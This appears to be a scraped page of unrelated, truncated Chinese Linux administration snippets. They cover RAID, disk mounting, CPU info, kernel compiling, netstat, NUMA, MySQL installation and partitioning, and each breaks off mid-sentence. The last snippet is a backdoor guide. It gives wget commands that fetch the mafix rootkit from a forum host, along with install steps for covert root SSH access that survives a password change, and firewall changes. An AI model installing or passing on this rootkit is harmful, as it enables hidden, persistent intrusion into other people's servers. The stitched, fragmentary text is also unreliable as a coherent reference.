linux服务器

文章目录 raid概念 raid分类 raid 0 raid 0特点： raid 1 raid 3 raid 5 raid10 raid概念 RAID（Redundant Array of Independent Disks，独立磁盘冗余阵列）可以提供较普通磁盘更高的速度、安全性，所以服务器在安装时都会选择创建RAID。 RAID的创建有两种方式：软RAID（通过操作系统软件来实现）和硬RAID（使用硬件阵列卡）；在企业中用的最多的是：raid1、raid10和raid5。不过随着云的高速发展，供应商一般可以把硬件问题解决掉。 企业用的最多的： RAID0 RAID1 RAID5 RAID10 raid分类 一共有0~6一共7种，这其中RAID 0、RAID1、RAID 5和RAID6比较常用。 raid 0 raid 0：如果你有n块磁盘，原来只能同时写一块磁盘，写满了再下一块，做了RAID 0之后，n块可以同时写，速度提升很快，但由于没有备份，可靠性很差。n最少为2。 raid 0特点： 成本低，可以提高整个磁盘的性能和吞吐量。 RAID 0没有提供冗余或错误修复能力，速度快. 任何一个磁盘的损坏将损坏全部数据；磁盘利用率为100%。 应用场景： 迅速读写，安全性要求不高， 比如图形工作站 raid 1 raid 1：正因为raid 0太不可靠，所以衍生出了raid 1

这里假设的是已经在阿里云管理后台购买完了新增的硬盘。我们只讲在Linux系统里操作挂载硬盘过程。 一、 环境： 操作系统： Centos 7 二、查看云服务下所有硬盘 使用root账号登录服务器，执行fdisk -l命令查看硬盘情况 vdb是我们新增加的一块硬盘，目录是没有挂载的情况 三、挂载新的硬盘 输入"fdisk /dev/vdb"，然后根据下图的提示，输入n，p，1，回车，回车，wq，保存退出。 四、格式化分区及挂载目录 1、第一步，先格式化vdb1分区 mkfs.ext3 /dev/vdb1 五、执行挂载操作 这样就把新的硬盘挂载上来了！！！ 来源： oschina 链接： https://my.oschina.net/u/179902/blog/3177981

　　在linux系统中，提供了/proc目录下文件，显示系统的软硬件信息。如果想了解系统中CPU的提供商和相关配置信息，则可以查/proc/cpuinfo。但是此文件输出项较多，不易理解。例如我们想获取，有多少颗物理CPU，每个物理cpu核心数，以及逻辑cpu和超线程等信息，下面我们就看来一步一步的去探索。 　　首先要明确物理 CPU 、核数、逻辑 cpu 数的概念 ①物理CPU数（physical id）：主板上实际插入的cpu数量，可以数不重复的 physical id 有几个 ②CPU核心数（cpu cores）：单块CPU上面能处理数据的芯片组的数量，如双核、四核等 ③逻辑CPU数：一般情况下， 　　逻辑CPU=物理CPU个数×每颗核数 　　#不支持超线程技术或没有开启次技术 　　逻辑CPU=物理CPU个数×每颗核数 *2 　 #表示服务器的CPU支持超线程技术（简单来说，它可使处理器中的1 颗内核如2 颗内核那样在操作系统中发挥作用。这样一来，操作系统可使用的执行资源扩大了一倍，大幅提高了系统的整体性能） 第一部分 cpuinfo 文件内容，涉及的项目解读 　　话不多少，看图说话。下图是我负责维护的一台服务器的CPU信息。使用cat /proc/cpuinfo。足足输出1500+条记录。其中内容均和下图相似，不同的是“：”右边的信息不同。 　

引用自https://linux.cn/article-9665-1.html 曾经有一段时间，升级 Linux 内核让很多用户打心里有所畏惧。在那个时候，升级内核包含了很多步骤，也需要很多时间。现在，内核的安装可以轻易地通过像 apt 这样的包管理器来处理。通过添加特定的仓库，你能很轻易地安装实验版本的或者指定版本的内核（比如针对音频产品的实时内核）。 考虑一下，既然升级内核如此容易，为什么你不愿意自行编译一个呢？这里列举一些可能的原因： 你想要简单了解编译内核的过程 你需要启用或者禁用内核中特定的选项，因为它们没有出现在标准选项里 你想要启用标准内核中可能没有添加的硬件支持 你使用的发行版需要你编译内核 你是一个学生，而编译内核是你的任务 不管出于什么原因，懂得如何编译内核是非常有用的，而且可以被视作一个通行权。当我第一次编译一个新的 Linux 内核（那是很久以前了），然后尝试从它启动，我从中（系统马上就崩溃了，然后不断地尝试和失败）感受到一种特定的兴奋。 既然这样，让我们来实验一下编译内核的过程。我将使用 Ubuntu 16.04 Server 来进行演示。在运行了一次常规的 sudo apt upgrade 之后，当前安装的内核版本是 4.4.0-121 。我想要升级内核版本到 4.17 ， 让我们小心地开始吧。 有一个警告：强烈建议你在虚拟机里实验这个过程。基于虚拟机

一、查看哪些IP连接本机 netstat -an 二、查看TCP连接数 1)统计80端口连接数 netstat -nat|grep -i "80"|wc -l 2）统计httpd协议连接数 ps -ef|grep httpd|wc -l 3）、统计已连接上的，状态为“established netstat -na|grep ESTABLISHED|wc -l 4)、查出哪个IP地址连接最多,将其封了. netstat -na|grep ESTABLISHED|awk {print $5}|awk -F: {print $1}|sort|uniq -c|sort -r +0n netstat -na|grep SYN|awk {print $5}|awk -F: {print $1}|sort|uniq -c|sort -r +0n --------------------------------------------------------------------------------------------- TCP连接状态详解 LISTEN： 侦听来自远方的TCP端口的连接请求 SYN-SENT： 再发送连接请求后等待匹配的连接请求 SYN-RECEIVED：再收到和发送一个连接请求后等待对方对连接请求的确认 ESTABLISHED： 代表一个打开的连接 FIN-WAIT

虚拟化Pod性能比裸机还要好，原因竟然是这样！ http://www.itpub.net/2020/02/27/5340/ 其实感觉 linux也可以做到 NUMA的节点优化其实 直接在 ESXi上面跑Pod的化 理论上跟 裸机道理一样。 之前的文章介绍过 VMware 在 VMworld 上宣布的太平洋项目 (Project Pacific) ，这是 vSphere 向 Kubernetes 原生平台的演进。太平洋项目引入了 vSphere 主管集群（ Supervisor Cluster ）的概念，该集群能够在 ESXi 上原生地运行 Kubernetes Pod（称为 Native Pod ）。 根据 VMware 官博上发布的信息，太平洋项目中通过虚拟化实现的 Native Pods，竟然比物理机（裸机）上 Kubernetes 的 pod 有8％的性能提升！ 是的，你的确没有看错，虚拟化 Pod 的性能要比裸机 Pod 要好，这似乎有悖常理，众所周知，虚拟化是有性能损失的，怎能优于裸机呢？且听笔者慢慢道来。 为什么太平洋项目的 Native Pods 更快？ 现代的服务器一般有多个处理器（CPU），采用的是 NUMA（非统一内存访问）的内存访问方式。在 NUMA 体系架构中，每个 CPU 负责管理一块内存，称为本地（local）内存。 当 CPU 访问自己管理的内存时

第一部分：安装Mysql5.7 1.下载YUM库 shell > wget http://dev.mysql.com/get/mysql57-community-release-el7-7.noarch.rpm 2.安装YUM库 shell > yum localinstall -y mysql57-community-release-el7-7.noarch.rpm 3.安装数据库 shell > yum install -y mysql-community-server 4.启动MySQL服务 shell > systemctl start mysqld.service 5.默认空密码 shell > mysql -uroot -p 6.重置root密码后重启mysql服务 shell > update mysql.user set authentication_string=password("yourpassword") where user="root" and Host="localhost"; shell > flush privileges; shell > quit; shell > systemctl restart mysqld; 如果手贱或者不知道啥原因出现如下问题： ERROR 1045 (28000): Access denied for user

本章课程内容大纲 1.开课前的铺垫、学习期的一些规则、学习过程中的问题、学习的方法、（笔记、录音、录视频） 2.快速了解什么是Linux、我们学习Linux需要具备哪些基础 3.学习Linux运维课程可以掌握哪些技术、或者说能拿到多少money？ 4.Linux的发展史(科普时间) 5.Linux的常见发型版本(Linux的家族) 6.如何看待Linux认证这件事情，我们要不要考证？ 7.安装VMware虚拟化产品–>安装Linux7操作系统 8.使用Xshell远程连接Linux服务器。 9.Vmware虚拟化产品超强功能介绍(快照 克隆) 1.规则： 1.上课时间，切记（不要过点！！！） 2.学习过程中如何提问？ 1.直接抛出问题 2.现在要做什么？期望的结果是什么？ 正常 错误： 将你出错的问题截图发到群里来 其目的很简单：让我们能快速定位问题，快速的解决问题。 谨记：当你出错了，系统一定会提示你的，”一定要相信电脑“，不要相信自己。 2.学习过程中碰到问题怎么办？ 1.求助 金牌助教老师 夏导 金牌讲师 徐导 建议直接在QQ群进行提问 2.百度（善用） 后期会教大家怎么查百度。 3.学习方法： 滚雪球：我啥都不会，跟着学，一点一点的把雪球滚大。（ 0基础，小白。） 不论各位有没有基础，跟着我们走，没问题！！！！！！！ 笔记： Markdown 语法编写笔记 （

第12节：硬盘介绍和磁盘管理 本节所讲内容： 12.1 SAS-SATA-SSD-SCSI-IDE硬盘讲解 IDE硬盘：老式硬盘，并口数据线，已经淘汰 SCSI硬盘：老式硬盘，已经被SAS硬盘取代 SAS硬盘：品牌服务器常用硬盘，串口数据线 规格：15000转/10000转 128M cache SATA硬盘：家用或服务器常用硬盘，串口数据线 规格：7200转/5400转 64M cache SSD/M2固态硬盘：速度很快，常用于做缓存或系统盘 尺寸说明：•3.5英寸设计 •2.5英寸设计 硬盘厂商：日立、西数、希捷等 12.2 磁盘分区工具和挂载 12.2.1 硬盘分区符认识 硬盘只有在分区、格式化、挂载后才能被centos系统使用 MBR主引导记录：在此种分区格式中，硬盘0柱面、0磁头、1扇区称为主引导扇区，在此512字节中，446字节存放主引导程序--grub;64字节存放分区表（四个记录);第三部分是magic number，占2个字节，固定为55AA 分区表编号：1-4是给主分区或扩展分区的 5以后是给逻辑分区 1）主分区：主要是用来启动操作系统的，它主要放的是操作系统的启动或引导程序，/boot单独分区作为主分区 2）扩展分区：不能独立使用， 只是为逻辑分区提供支撑 3）逻辑分区：可以存放数据 例1： [root@node-1 ~]# ls /dev/sda* /dev

后门 (1)开机自动反弹shell (2)linux后门 Rookit 目前常用的有：t0rn /mafix/enyelkm 等 mafix rootkit Mafix是一款常用的轻量应用级别Rootkits，是通过伪造ssh协议漏洞实现远程登陆的特点是配置简单并可以自定义验证密码和端口号。 URL:http://forum.eviloctal.com/attachment.php?aid=13419 注意：在某些linux发行版上可能会遇到问题导致功能问题 安装及使用： wget http://forum.eviloctal.com/attachment.php?aid=13419 tar zvxf mafix.tar.gz cd mafix chmod +x root ./root pass port 安装完成后，使用ssh 用户@IP -P 配置的端口，即可远程登录。 netstat -tnl 也验证端口是开放的。之前解压文件的目录/home/mafix在编译完后自动消失，便于隐藏。 现在就可以用root，加上新密码、端口进行登录了，即使管理员改了root的密码也可以登录。 若无法登录，检查Linux的防火墙是否关闭，或者是否把新端口加入iptables中： iptables -A RH-Firewall-1-INPUT -m state --state NEW -m tcp